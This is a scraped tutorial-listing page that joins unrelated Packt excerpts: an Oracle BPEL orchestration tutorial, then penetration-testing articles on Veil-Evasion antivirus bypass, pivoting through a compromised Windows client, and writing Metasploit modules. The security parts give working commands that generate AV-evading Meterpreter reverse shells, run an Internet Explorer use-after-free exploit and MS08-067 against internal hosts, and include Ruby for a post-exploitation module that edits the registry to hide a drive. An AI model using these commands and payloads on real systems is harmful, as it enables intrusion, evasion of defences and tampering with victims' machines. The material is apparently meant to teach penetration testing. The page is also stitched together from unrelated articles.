
How-To Tutorials - Penetration Testing


test-article

Packt
16 Jul 2014
13 min read
Service Invocation

Time for action – creating the book warehousing process

Let's create the BookWarehousingBPEL BPEL process:

1. Open the SOA composite by double-clicking on Bookstore in the process tree. In the composite, we can see both bookstore BPEL processes and their WSDL interfaces.

2. Add a new BPEL process by dragging-and-dropping the BPEL Process service component from the right-hand side toolbar. An already-familiar dialog window will open, where we specify the BPEL 2.0 version, enter the process name as BookWarehousingBPEL, modify the namespace to http://packtpub.com/Bookstore/BookWarehousingBPEL, and select Synchronous BPEL Process. We leave all other fields at their default values:

[Insert image 8963EN_02_03.png]

3. Next, we wire the BookWarehousingBPEL component with the BookstoreABPEL and BookstoreBBPEL components. This establishes a partner link between them. First, we create the wire to the BookstoreBBPEL component (although the order doesn't matter). To do this, click on the bottom-right side of the component. Once you place the mouse pointer above the component, circles appear on its edges. Start with the circle labelled Drag to add a new Reference and connect it with the service interface circle, as shown in the following figure:

[Insert image 8963EN_02_04.png]

4. Do the same to wire the BookWarehousingBPEL component with the BookstoreABPEL component:

[Insert image 8963EN_02_05.png]

We should now see the following. Notice that the BookWarehousingBPEL component is wired to the BookstoreABPEL and BookstoreBBPEL components:

[Insert image 8963EN_02_06.png]

What just happened?

We added the BookWarehousingBPEL component to our SOA composite and wired it to the BookstoreABPEL and BookstoreBBPEL components. Creating the wires between components means that references have been created and relations between components have been established. In other words, we have expressed that the BookWarehousingBPEL component will be able to invoke the BookstoreABPEL and BookstoreBBPEL components. This is exactly what we want to achieve with our BookWarehousingBPEL process, which will orchestrate both bookstore BPELs. Once we have created the components and wired them accordingly, we are ready to implement the BookWarehousingBPEL process.

What just happened?

We implemented the process flow logic for the BookWarehousingBPEL process. It orchestrated two other services: it invoked the BookstoreA and BookstoreB BPEL processes that we developed in the previous chapter. Here, these two BPEL processes acted like services.

First, we created the XML schema elements for the request and response messages of the BPEL process. We created four variables: BookstoreARequest, BookstoreAResponse, BookstoreBRequest, and BookstoreBResponse. The BPEL code for the variable declarations looks like the code shown in the following screenshot:

[Insert image 8963EN_02_18b.png]

Then, we added the <assign> activity to prepare a request for both bookstore BPEL processes, copying the BookData element from inputVariable to the BookstoreARequest and BookstoreBRequest variables. The following BPEL code is generated:

[Insert image 8963EN_02_18c.png]

Next, we invoked both bookstore BPEL services using the <invoke> activity. The BPEL source code reads like the following screenshot:

[Insert image 8963EN_02_18d.png]
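Since the screenshots are not reproduced here, the following is a minimal sketch of what the generated fragments might look like. The message types, namespace prefixes, and part names are illustrative guesses based on the walkthrough, not the exact generated code:

```xml
<!-- Illustrative sketch only; names and prefixes are assumptions -->
<variables>
  <variable name="inputVariable"      messageType="client:BookWarehousingBPELRequestMessage"/>
  <variable name="outputVariable"     messageType="client:BookWarehousingBPELResponseMessage"/>
  <variable name="BookstoreARequest"  messageType="ns1:BookstoreABPELRequestMessage"/>
  <variable name="BookstoreAResponse" messageType="ns1:BookstoreABPELResponseMessage"/>
  <variable name="BookstoreBRequest"  messageType="ns2:BookstoreBBPELRequestMessage"/>
  <variable name="BookstoreBResponse" messageType="ns2:BookstoreBBPELResponseMessage"/>
</variables>

<assign name="PrepareRequests">
  <!-- Copy the incoming BookData element to both bookstore requests -->
  <copy>
    <from>$inputVariable.payload/client:BookData</from>
    <to>$BookstoreARequest.payload/ns1:BookData</to>
  </copy>
  <copy>
    <from>$inputVariable.payload/client:BookData</from>
    <to>$BookstoreBRequest.payload/ns2:BookData</to>
  </copy>
</assign>

<invoke name="InvokeBookstoreA" partnerLink="BookstoreABPEL"
        operation="process" inputVariable="BookstoreARequest"
        outputVariable="BookstoreAResponse"/>
<invoke name="InvokeBookstoreB" partnerLink="BookstoreBBPEL"
        operation="process" inputVariable="BookstoreBRequest"
        outputVariable="BookstoreBResponse"/>
```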
Finally, we added the <if> activity to select the bookstore with the lowest stock quantity:

[Insert image 8963EN_02_18e.png]

With this, we have concluded the development of the book warehousing BPEL process and are ready to deploy and test it.

Deploying and testing the book warehousing BPEL

We deploy the project to the SOA Suite process server the same way as we did in the previous chapter, by right-clicking on the project, selecting Deploy, and then navigating through the options. As we are redeploying the whole SOA composite, make sure the Overwrite option is selected. You should check that both the compilation and the deployment have been successful.

Then, we log in to the Enterprise Manager console, select the bookstore project, and click on the Test button. Be sure to select bookwarehousingbpel_client for the test. After entering the parameters, as shown in the following figure, we click on the Test Web Service button to initiate the BPEL process, and we should receive an answer (Bookstore A or Bookstore B, depending on the data that we have entered).

Remember that our BookWarehousingBPEL process orchestrated two other services: it invoked the BookstoreA and BookstoreB BPEL processes. To verify this, we can launch the flow trace (click on the Launch Flow Trace button) in the Enterprise Manager console, where we will see that the two bookstore BPEL processes have been invoked, as shown:

[Insert image 8963EN_02_19.png]

An even more interesting view is the flow view, which also shows that both bookstore services have been invoked. Click on BookWarehousingBPEL to open up the audit trail:

[Insert image 8963EN_02_20.png]

Understanding partner links

When invoking services, we have often mentioned partner links. Partner links denote all the interactions that a BPEL process has with external services. There are two possibilities:

- The BPEL process invokes operations on other services.
- The BPEL process receives invocations from clients. One of the clients is the user of the BPEL process, who makes the initial invocation. Other clients are services, for example, those that have been invoked by the BPEL process, but may return replies.

Links to all the parties that BPEL interacts with are called partner links. Partner links can be links to services that are invoked by the BPEL process; these are sometimes called invoked partner links. Partner links can also be links to clients that invoke the BPEL process; such partner links are sometimes called client partner links. Note that each BPEL process has at least one client partner link, because there has to be a client that first invokes the BPEL process. Usually, a BPEL process will also have several invoked partner links, because it will most likely invoke several services.

In our case, the BookWarehousingBPEL process has one client partner link and two invoked partner links, BookstoreABPEL and BookstoreBBPEL. You can observe this on the SOA composite design view and on the BPEL process itself, where the client partner links are located on the left-hand side of the design view, while the invoked partner links are located on the right-hand side.
Partner link types

Describing situations where the service is invoked by the process, and vice versa, requires selecting a certain perspective. We can select the process perspective and describe the process as requiring portTypeA on the service and providing portTypeB to the service. Alternatively, we can select the service perspective and describe the service as offering portTypeA to the BPEL process and requiring portTypeB from the process.

Partner link types allow us to model such relationships as a third party. We are not required to take a certain perspective; rather, we just define roles. A partner link type must have at least one role and can have at most two roles; the latter is the usual case. For each role, we must specify a portType that is used for interaction.

Partner link types are defined in the WSDLs. If we take a closer look at the BookWarehousingBPEL.wsdl file, we can see the following partner link type definition:

[Insert image 8963EN_02_22.png]

If we specify only one role, we express the willingness to interact with the service, but do not place any additional requirements on it. Sometimes, existing services will not define a partner link type. In that case, we can wrap the WSDL of the service and define partner link types ourselves.

Now that we have become familiar with partner link types and know that they belong to WSDL, it is time to go back to the BPEL process definition, more specifically to the partner links.

Defining partner links

Partner links are concrete references to services that a BPEL business process interacts with. They are specified near the beginning of the BPEL process definition document, just after the <process> tag. Several <partnerLink> definitions are nested within the <partnerLinks> element:

```xml
<process ...>
  <partnerLinks>
    <partnerLink ... />
    <partnerLink ... />
    ...
  </partnerLinks>

  <sequence>
    ...
  </sequence>
</process>
```

For each partner link, we have to specify the following:

- name: This serves as a reference for interactions via that partner link.
- partnerLinkType: This defines the type of the partner link.
- myRole: This indicates the role of the BPEL process itself.
- partnerRole: This indicates the role of the partner.
- initializePartnerRole: This indicates whether the BPEL engine should initialize the partner link's partner role value. This is an optional attribute and should only be used with partner links that specify the partner role.

We define both roles (myRole and partnerRole) only if the partnerLinkType specifies two roles. If the partnerLinkType specifies only one role, the partnerLink also has to specify only one role; we omit the one that is not needed.

Let's go back to our example, where we have defined the BookstoreABPEL partner link type. To define a partner link, we need to specify the partner role, because it is a synchronous relation. The definition is shown in the following code excerpt:

[Insert image 8963EN_02_23.png]
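The excerpt is not reproduced here; a minimal sketch of what the partner link type (in the WSDL) and the corresponding partner link (in the BPEL process) might look like follows. The role names and namespace prefixes are illustrative assumptions, not the exact generated code:

```xml
<!-- In BookstoreABPEL.wsdl (sketch; names are assumptions) -->
<plnk:partnerLinkType name="BookstoreABPEL">
  <plnk:role name="BookstoreABPELProvider"
             portType="ns1:BookstoreABPEL"/>
</plnk:partnerLinkType>

<!-- In the BPEL process definition (sketch) -->
<partnerLinks>
  <partnerLink name="BookstoreABPEL"
               partnerLinkType="ns1:BookstoreABPEL"
               partnerRole="BookstoreABPELProvider"/>
</partnerLinks>
```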
With this, we have concluded the discussion on partner links and partner link types. We will continue with parallel service invocation.

Parallel service invocation

BPEL also supports parallel service invocation. In our example, we invoked Bookstore A and Bookstore B sequentially. This way, we need to wait for the response from the first service and then for the response from the second service. If these services take longer to execute, the response times add up. If we invoke both services in parallel, we only need to wait for the duration of the longer-lasting call, as shown in the following screenshot:

[Insert image 8963EN_02_24.png]

BPEL has several possibilities for parallel flows, which will be described in detail in Chapter 8, Dynamic Parallel Invocations. Here, we present the basic parallel service invocation using the <flow> activity. To invoke services in parallel, or to perform any other activities in parallel, we can use the <flow> activity. Within the <flow> activity, we can nest an arbitrary number of flows, and all of them will execute in parallel. Let's try to modify our example so that Bookstore A and B will be invoked in parallel.

Time for action – developing parallel flows

Let's now modify the BookWarehousingBPEL process so that the BookstoreA and BookstoreB services will be invoked in parallel. We should do the following:

1. To invoke the BookstoreA and BookstoreB services in parallel, we need to add the Flow structured activity to the process flow just before the first invocation, as shown in the following screenshot:

[Insert image 8963EN_02_25.png]

2. We see that two parallel branches have been created. We simply drag-and-drop both invoke activities into the parallel branches:

[Insert image 8963EN_02_26.png]

That's all! We can create more parallel branches if needed, by clicking on the Add Sequence icon.

What just happened?

We modified the BookWarehousingBPEL process so that the BookstoreA and BookstoreB <invoke> activities are executed in parallel. A corresponding <flow> activity has been created in the BPEL source code. Within the <flow> activity, both <invoke> activities are nested. Notice that each <invoke> activity is placed within its own <sequence> activity. This would make sense if we required more than one activity in each parallel branch. The BPEL source code looks like the one shown in the following screenshot:

[Insert image 8963EN_02_27.png]

Deploying and testing the parallel invocation

We deploy the project to the SOA Suite process server the same way we did in the previous sample. Then, we log in to the Enterprise Manager console, select the Bookstore project, and click on the Test Web Service button. To observe that the services have been invoked in parallel, we can launch the flow trace (click on the Launch Flow Trace button) in the Enterprise Manager console, click on the book warehousing BPEL process, and activate the flow view, which shows that both bookstore services have been invoked in parallel.

Understanding parallel flow

To invoke services concurrently, we can use the <flow> construct. In the following example, the three <invoke> operations will perform concurrently:

```xml
<process ...>
  ...
  <sequence>

    <!-- Wait for the incoming request to start the process -->
    <receive ... />

    <!-- Invoke a set of related services, concurrently -->
    <flow>
      <invoke ... />
      <invoke ... />
      <invoke ... />
    </flow>
    ...
    <!-- Return the response -->
    <reply ... />

  </sequence>
</process>
```

We can also combine and nest the <sequence> and <flow> constructs, which allows us to define several sequences that execute concurrently. In the following example, we have defined two sequences, one that consists of three invocations and one with two invocations. Both sequences will execute concurrently:

```xml
<process ...>
  ...
  <sequence>

    <!-- Wait for the incoming request to start the process -->
    <receive ... />

    <!-- Invoke two sequences concurrently -->
    <flow>
      <!-- The three invokes below execute sequentially -->
      <sequence>
        <invoke ... />
        <invoke ... />
        <invoke ... />
      </sequence>
      <!-- The two invokes below execute sequentially -->
      <sequence>
        <invoke ... />
        <invoke ... />
      </sequence>
    </flow>
    ...
    <!-- Return the response -->
    <reply ... />

  </sequence>
</process>
```

We can use other activities as well within the <flow> activity to achieve parallel execution.
With this, we have concluded our discussion on the parallel invocation.

Pop quiz – service invocation

Q1. Which activity is used to invoke services from BPEL processes?

- <receive>
- <invoke>
- <sequence>
- <flow>
- <process>
- <reply>

Q2. Which parameters do we need to specify for the <invoke> activity?

- endpointURL
- partnerLink
- operationName
- operation
- portType
- portTypeLink

Q3. In which file do we declare partner link types?

Q4. Which activity is used to execute service invocation and other BPEL activities in parallel?

- <receive>
- <invoke>
- <sequence>
- <flow>
- <process>
- <reply>

Summary

In this chapter, we learned how to invoke services and orchestrate them. We explained the primary mission of BPEL: service orchestration, which follows the concept of programming-in-the-large. We developed a BPEL process that invoked two services and orchestrated them. We became familiar with the <invoke> activity and the background of service invocation, particularly partner links and partner link types. We also learned that it is very easy to invoke services in parallel from BPEL. To achieve this, we use the <flow> activity. Within <flow>, we can nest not only several <invoke> activities but also other BPEL activities. Now, we are ready to learn about variables and data manipulation, which we will do in the next chapter.


Veil-Evasion

Packt
18 Jun 2014
6 min read
A new AV-evasion framework called Veil-Evasion (www.Veil-Evasion.com), written by Chris Truncer, now provides effective protection against the detection of standalone exploits. Veil-Evasion aggregates various shellcode injection techniques into a framework that simplifies management. As a framework, Veil-Evasion has several features, which include the following:

- It incorporates custom shellcode in a variety of programming languages, including C, C#, and Python
- It can use Metasploit-generated shellcode
- It can integrate third-party tools such as Hyperion (which encrypts an EXE file with 128-bit AES encryption), PEScrambler, and BackDoor Factory
- The Veil-Evasion_evasion.cna script allows Veil-Evasion to be integrated into Armitage and its commercial version, Cobalt Strike
- Payloads can be generated and seamlessly substituted into all PsExec calls
- Users can reuse shellcode or implement their own encryption methods
- Its functionality can be scripted to automate deployment
- Veil-Evasion is under constant development, and the framework has been extended with modules such as Veil-Catapult (the payload delivery system)

Veil-Evasion can generate an exploit payload; the standalone payloads include the following options:

- A minimal Python installation to invoke shellcode; it uploads a minimal Python.zip installation and the 7zip binary. The Python environment is unzipped, invoking the shellcode. Since the only files that interact with the victim are trusted Python libraries and the interpreter, the victim's AV does not detect or alarm on any unusual activity.
- The sethc backdoor, which configures the victim's registry to launch the sticky keys RDP backdoor.
- A PowerShell shellcode injector.

When the payloads have been created, they can be delivered to the target in one of the following two ways:

- Upload and execute using Impacket and the PTH toolkit
- UNC invocation

Veil-Evasion is available from the Kali repositories and is installed by simply entering apt-get install veil-evasion at a command prompt. If you receive any errors during installation, re-run the /usr/share/veil-evasion/setup/setup.sh script.

On launch, Veil-Evasion presents the user with the main menu, which shows the number of payload modules that are loaded as well as the available commands. Typing list will list all available payloads, list langs will list the available language payloads, and list <language> will list the payloads for a specific language. Veil-Evasion's initial launch screen is shown in the following screenshot:

Veil-Evasion is undergoing rapid development, with significant releases on a monthly basis and important upgrades occurring more frequently. Presently, there are 24 payloads designed to bypass antivirus by employing encryption or direct injection into the memory space. These payloads are shown in the next screenshot:

To obtain information on a specific payload, type info <payload number / payload name> or info <tab> to autocomplete the payloads that are available. You can also just enter the number from the list. In the following example, we entered 19 to select the python/shellcode_inject/aes_encrypt payload:

The exploit includes an expire_payload option. If the module is not executed by the target user within a specified timeframe, it is rendered inoperable. This function contributes to the stealthiness of the attack.
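Since the screenshots are not reproduced here, a hypothetical session using the commands just described might look like the following; the comments and menu behavior are illustrative, and the payload numbering varies between releases:

```
$ apt-get install veil-evasion    # install from the Kali repositories
$ veil-evasion                    # launch the framework's interactive menu

# At the framework's menu prompt:
list                              # show all loaded payload modules
list langs                        # show available payload languages
list python                       # show only the Python payloads
info 19                           # details on python/shellcode_inject/aes_encrypt
19                                # select the payload by its list number
```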
The required options include the names of the options as well as their default values and descriptions. If a required value isn't completed by default, the tester will need to input a value before the payload can be generated. To set the value for an option, enter set <option name> and then type the desired value. To accept the default options and create the exploit, type generate in the command prompt.

If the payload uses shellcode, you will be presented with the shellcode menu, where you can select msfvenom (the default shellcode) or a custom shellcode. If the custom shellcode option is selected, enter the shellcode in the form of \x01\x02, without quotes or newlines (\n). If the default msfvenom is selected, you will be prompted with the default payload choice of windows/meterpreter/reverse_tcp. If you wish to use another payload, press Tab to complete the available payloads. The available payloads are shown in the following screenshot:

In the following example, the [tab] command was used to demonstrate some of the available payloads; however, the default (windows/meterpreter/reverse_tcp) was selected, as shown in the following screenshot:

The user will then be presented with the output menu and a prompt to choose the base name for the generated payload files. If the payload was Python-based and you selected compile_to_exe as an option, you will have the option of either using Pyinstaller to create the EXE file or generating Py2Exe files, as shown in the following screenshot:

The final screen displays information on the generated payload, as shown in the following screenshot:

The exploit could also have been created directly from the command line using the following options:

```
kali@linux:~$ ./Veil-Evasion.py -p python/shellcode_inject/aes_encrypt -o output --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.43.134 LPORT=4444
```

Once an exploit has been created, the tester should verify the payload against VirusTotal to ensure that it will not trigger an alert when it is placed on the target system. If the payload sample is submitted directly to VirusTotal and its behavior flags it as malicious software, then a signature update against the submission can be released by antivirus (AV) vendors in as little as one hour. This is why users are clearly admonished with the message "don't submit samples to any online scanner!"

Veil-Evasion allows testers to use a safe check against VirusTotal. When any payload is created, a SHA1 hash is created and added to hashes.txt, located in the ~/veil-output directory. Testers can invoke the checkvt script to submit the hashes to VirusTotal, which will check the SHA1 hash values against its malware database. If a Veil-Evasion payload triggers a match, then the tester knows that it may be detected by the target system; if it does not trigger a match, then the exploit payload should bypass the antivirus software. A successful lookup (not detectable by AV) using the checkvt command is shown as follows:

Testing thus far supports the finding that if checkvt does not find a match on VirusTotal, the payload will not be detected by the target's antivirus software. To use the payload with the Metasploit Framework, use exploit/multi/handler and set PAYLOAD to windows/meterpreter/reverse_tcp (the same as the Veil-Evasion payload option), with the same LHOST and LPORT used with Veil-Evasion. When the listener is running, send the exploit to the target system; when the target launches it, a reverse shell will be established back to the attacker's system.
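A sketch of the matching handler setup in msfconsole, using the same payload and connection values as the Veil-Evasion example above:

```
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.43.134
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit -j
```

Running the handler with -j keeps it listening as a background job, so the console stays free while waiting for the target to execute the payload.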
Summary

Kali provides several tools to facilitate the development, selection, and activation of exploits, including the internal exploit-db database as well as several frameworks that simplify the use and management of exploits. Among these frameworks, the Metasploit Framework and Armitage are particularly important; however, Veil-Evasion enhances both with its ability to bypass antivirus detection.


Using the client as a pivot point

Packt
17 Jun 2014
6 min read
Pivoting

To set up our potential pivot point, we first need to exploit a machine. Then we need to check for a second network card on the machine, connected to another network that we cannot reach without going through the machine we exploited. As an example, we will use three machines, with the Kali Linux machine as the attacker, a Windows XP machine as the first victim, and a Windows Server 2003 machine as the second victim.

The scenario is that we get a client to visit our malicious site, and we use a use-after-free exploit against Microsoft Internet Explorer. This type of exploit has continued to plague the product for a number of revisions. An example of this is shown in the following screenshot from the Exploit DB website:

The exploit listed at the top of the list is one that targets Internet Explorer 9. As an example, we will target an exploit against Internet Explorer 8; the concept of the attack is the same. In simple terms, Internet Explorer developers continue to make the mistake of not cleaning up memory after it is allocated.

Start up your Metasploit tool by entering msfconsole. Once the console has come up, enter search cve-2013-1347 to search for the exploit. An example of the results of the search is shown in the following screenshot:

One concern is that the exploit is rated as good, whereas we prefer ratings of excellent or better when we select our exploits. For our purposes, we will see whether we can make it work. Of course, there is always a chance we will not find what we need and will have to choose to either write our own exploit or document it and move on with the testing.

For the example used here, the Kali machine is 192.168.177.170, and it is what we set our LHOST to. For your purposes, you will have to use the Kali address that you have. We will enter the following commands in the Metasploit window:

```
use exploit/windows/browser/ie_cgenericelement_uaf
set SRVHOST 192.168.177.170
set LHOST 192.168.177.170
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
```

An example of the results of the preceding commands is shown in the following screenshot:

As the previous screenshot shows, we now have the URL that we need the user to access. For our purposes, we will just copy and paste it into Internet Explorer 8 running on the Windows XP Service Pack 3 machine. Once we have pasted it, we may need to refresh the browser a couple of times to get the payload to work; however, in real life we get just one chance, so select your exploits carefully so that one click by the victim does the intended work. Hence, to be a successful tester, a lot of practice and knowledge about the various exploits is of the utmost importance. An example of what you should see once the exploit is complete and your session is created is shown in the following screenshot:

We now have a shell on the machine, and we want to check whether it is dual-homed. In the Meterpreter shell, enter ipconfig to see whether the machine you have exploited has a second network card. An example from the machine we exploited is shown in the following screenshot:

As the previous screenshot shows, we are in luck: we have a second network card connected and another network for us to explore, so let us do that now. The first thing we have to do is set the shell up to route to our newly found network.
This is another reason why we chose the Meterpreter shell: it provides us with the capability to set the route up. In the shell, enter run autoroute -s 10.2.0.0/24 to set up a route to our 10 network. Once the command is complete, enter run autoroute -p to display the routing table. An example of this is shown in the following screenshot:

As the previous screenshot shows, we now have a route to our 10 network via session 1. So, now it is time to see what is on our 10 network. Next, we will background session 1; press Ctrl + Z to background the session. We will use the scan capability from within the Metasploit tool. Enter the following commands:

```
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.2.0.0/24
set PORTS 139,445
set THREADS 50
run
```

The port scanner is not very efficient, and the scan will take some time to complete. You can elect to use the Nmap scanner directly in Metasploit instead; enter nmap -sP 10.2.0.0/24. Once you have identified the live systems, conduct the scanning methodology against the targets. For our example here, we have our target located at 10.2.0.149. An example of the results of this scan is shown in the following screenshot:

We now have a target, and we could use a number of the methods we covered earlier against it. For our purposes here, we will see whether we can exploit the target using the famous MS08-067 Server Service buffer overflow. In the Metasploit window, background the session and enter the following commands:

```
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.2.0.149
set PAYLOAD windows/meterpreter/bind_tcp
exploit
```

If all goes well, you should see a shell open on the machine. When it does, enter ipconfig to view the network configuration of the machine. From here, it is just a matter of carrying out the process we followed before, and if you find another dual-homed machine, you can make another pivot and continue. An example of the results is shown in the following screenshot:

As the previous screenshot shows, the pivot was successful, and we now have another session open within Metasploit. This is reflected by the Local Pipe | Remote Pipe reference. Once you have finished reviewing the information, enter sessions to display the information for the sessions. An example of this result is shown in the following screenshot:

Summary

In this article, we looked at the powerful technique of establishing a pivot point from a client.


Metasploit Custom Modules and Meterpreter Scripting

Packt
03 Jun 2014
10 min read
Writing out a custom FTP scanner module

Let's try and build a simple module. We will write a simple FTP fingerprinting module and see how things work. Let's examine the code for the FTP module:

```ruby
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'Apex FTP Detector',
      'Description' => '1.0',
      'Author'      => 'Nipun Jaswal',
      'License'     => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(21),
      ], self.class)
  end
```

We start our code by defining the required libraries. We state require 'msf/core' to include the path to the core libraries at the very first step. Then, we define what kind of module we are creating; in this case, we are writing an auxiliary module, exactly the way we did for the previous module. Next, we define the library files we need to include from the core library set. Here, the include Msf::Exploit::Remote::Ftp statement refers to the /lib/msf/core/exploit/ftp.rb file, and include Msf::Auxiliary::Scanner refers to the /lib/msf/core/auxiliary/scanner.rb file. We have already discussed the scanner.rb file in detail in the previous example. The ftp.rb file contains all the necessary methods related to FTP, such as methods for setting up a connection, logging in to the FTP service, sending an FTP command, and so on.

Next, we define the information about the module we are writing and attributes such as name, description, author name, and license in the initialize method. We also define what options are required for the module to work. For example, here we assign RPORT to port 21 by default.

Let's continue with the remaining part of the module:

```ruby
  def run_host(target_host)
    connect(true, false)
    if(banner)
      print_status("#{rhost} is running #{banner}")
    end
    disconnect
  end
end
```

We define the run_host method, which initiates the process of connecting to the target by overriding the run_host method from the /lib/msf/core/auxiliary/scanner.rb file. Similarly, we use the connect function from the /lib/msf/core/exploit/ftp.rb file, which is responsible for initializing a connection to the host. We supply two parameters to the connect function: true and false. The true parameter enables the use of global parameters, whereas false turns off the verbose capabilities of the module. The beauty of the connect function lies in its operation of connecting to the target and automatically recording the banner of the FTP service in the parameter named banner, as shown in the following screenshot:

Now we know that the result is stored in the banner attribute. Therefore, we simply print out the banner at the end and disconnect from the target. This was an easy module, and I recommend that you try building simple scanners and other modules like these.

Nevertheless, before we run this module, let's check whether the module we just built is syntactically correct. We can do this by passing the module through an in-built Metasploit tool named msftidy, as shown in the following screenshot:

We will get a warning message indicating that there are a few extra spaces at the end of line number 19. When we remove the extra spaces and rerun msftidy, we see that no error is generated, which means the syntax of the module is correct.
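The screenshot is not reproduced here; the check is simply the msftidy script run against the module file. The paths and filename below are illustrative and assume the module was saved under the auxiliary scanner tree of a standard Kali install:

```
cd /usr/share/metasploit-framework
ruby tools/msftidy.rb modules/auxiliary/scanner/ftp/apex_ftp_detector.rb
```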
Now, let's run this module and see what we gather:

We can see that the module ran successfully, and it has the banner of the service running on port 21, which is Baby FTP Server. For further reading on the acceptance of modules in the Metasploit project, refer to https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements.

Writing out a custom HTTP server scanner

Now, let's take a step further into development and fabricate something a bit trickier. We will create a simple fingerprinter for HTTP services, but with a slightly more complex approach. We will name this file http_myscan.rb, as shown in the following code snippet:

```ruby
require 'rex/proto/http'
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'Server Service Detector',
      'Description' => 'Detects Service On Web Server, Uses GET to Pull Out Information',
      'Author'      => 'Nipun_Jaswal',
      'License'     => MSF_LICENSE
    )
  end
```

We include all the necessary library files as we did for the previous modules. We also assign general information about the module in the initialize method, as shown in the following code snippet:

```ruby
  def os_fingerprint(response)
    if not response.headers.has_key?('Server')
      return "Unknown OS (No Server Header)"
    end
    case response.headers['Server']
    when /Win32/, /Windows/, /IIS/
      os = "Windows"
    when /Apache/
      os = "*Nix"
    else
      os = "Unknown Server Header Reporting: " + response.headers['Server']
    end
    return os
  end

  def pb_fingerprint(response)
    if not response.headers.has_key?('X-Powered-By')
      resp = "No-Response"
    else
      resp = response.headers['X-Powered-By']
    end
    return resp
  end

  def run_host(ip)
    connect
    res = send_request_raw({'uri' => '/', 'method' => 'GET' })
    return if not res
    os_info = os_fingerprint(res)
    pb = pb_fingerprint(res)
    fp = http_fingerprint(res)
    print_status("#{ip}:#{rport} is running #{fp} version And Is Powered By: #{pb} Running On #{os_info}")
  end
end
```

The preceding module is similar to the one we discussed in the very first example. We have the run_host method here with ip as a parameter, which will open a connection to the host. Next, we have send_request_raw, which will fetch the response from the website or web server at / with a GET request. The fetched result is stored in the variable named res.

We pass the value of the response in res to the os_fingerprint method. This method checks whether the response has the Server key in its header; if the Server key is not present, we are presented with a message saying Unknown OS. However, if the response header has the Server key, we match it against a variety of values using regex expressions. If a match is made, the corresponding value of os is sent back to the calling definition, which is the os_info parameter.

Now, we check which technology is running on the server. We create a similar function, pb_fingerprint, but look for the X-Powered-By key rather than Server. Similarly, we check whether this key is present in the response or not. If the key is not present, the method returns No-Response; if it is present, the value of X-Powered-By is returned to the calling method and stored in the variable pb. Next, we use the http_fingerprint method that we used in the previous examples as well and store its result in the variable fp. We simply print out the values returned from os_fingerprint, pb_fingerprint, and http_fingerprint using their corresponding variables.
Let's see what output we'll get after running this module:

```
msf auxiliary(http_myscan) > run
[*] 192.168.75.130:80 is running Microsoft-IIS/7.5 version And Is Powered By: ASP.NET Running On Windows
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Writing out post-exploitation modules

Now that we have seen the basics of module building, we can take a step further and try to build a post-exploitation module. A point to remember here is that we can only run a post-exploitation module after a target has been compromised successfully. So, let's begin with a simple drive-disabler module, which will disable C: on the target system:

```ruby
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'

class Metasploit3 < Msf::Post
  include Msf::Post::Windows::Registry

  def initialize
    super(
      'Name'        => 'Drive Disabler Module',
      'Description' => 'C Drive Disabler Module',
      'License'     => MSF_LICENSE,
      'Author'      => 'Nipun Jaswal'
    )
  end
```

We started in the same way as we did in the previous modules. We added the paths to all the required libraries we need in this post-exploitation module. In addition, the include Msf::Post::Windows::Registry statement refers to the /core/post/windows/registry.rb file, which gives us the power to use registry manipulation functions with ease using Ruby mixins. Next, we define the type of module as Post for post-exploitation, with Metasploit3 as the intended version. Then we define the necessary information about the module in the initialize method, just as we did for the previous modules.

Let's see the remaining part of the module:

```ruby
  def run
    key1 = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\"
    print_line("Disabling C Drive")
    meterpreter_registry_setvaldata(key1, 'NoDrives', '4', 'REG_DWORD')
    print_line("Setting No Drives For C")
    meterpreter_registry_setvaldata(key1, 'NoViewOnDrives', '4', 'REG_DWORD')
    print_line("Removing View On The Drive")
    print_line("Disabled C Drive")
  end
end # class
```

We created a variable called key1 and stored in it the path of the registry where we need to create values to disable the drives. As we are in a Meterpreter shell after the exploitation has taken place, we use the meterpreter_registry_setvaldata function from the /core/post/windows/registry.rb file to create a registry value at the path defined by key1. This operation creates a new registry value named NoDrives of the REG_DWORD type at the path defined by key1.

However, you might be wondering why we supplied 4 as the bitmask. To calculate the bitmask for a particular drive, we have a little formula: 2^(drive letter's position in the alphabet - 1). Suppose we need to disable the C drive. We know that C is the third letter of the alphabet. Therefore, we can calculate the exact bitmask value for disabling the C drive as follows: 2^(3-1) = 2^2 = 4. Hence, the bitmask is 4 for disabling C:.

We also created another value, NoViewOnDrives, to disable the view of these drives, with exactly the same parameters.

Now, when we run this module, it gives the following output:

So, let's see whether we have successfully disabled C: or not:

Bingo! No C:. We successfully disabled C: from the user's view. We can create as many post-exploitation modules as we want according to our needs. I recommend you put some extra time toward the libraries of Metasploit.
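Returning to the bitmask formula used above, here is a quick standalone Ruby check (not part of the module) that computes the value for any drive letter:

```ruby
# Compute the Explorer NoDrives bitmask for a single drive letter.
# A is position 1, B is 2, C is 3, ... so the mask is 2^(position - 1).
def drive_bitmask(letter)
  2 ** (letter.upcase.ord - 'A'.ord)
end

puts drive_bitmask('C')  # => 4
puts drive_bitmask('D')  # => 8
```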
Make sure you have user-level access rather than SYSTEM for the preceding module to work, as SYSTEM privileges will not create the registry values under HKCU. In addition, we used HKCU instead of writing HKEY_CURRENT_USER because of the inbuilt normalization, which automatically expands the key to its full form. I recommend you check the registry.rb file to see the various available methods.


Ruby and Metasploit Modules

Packt
23 May 2014
11 min read
Reinventing Metasploit

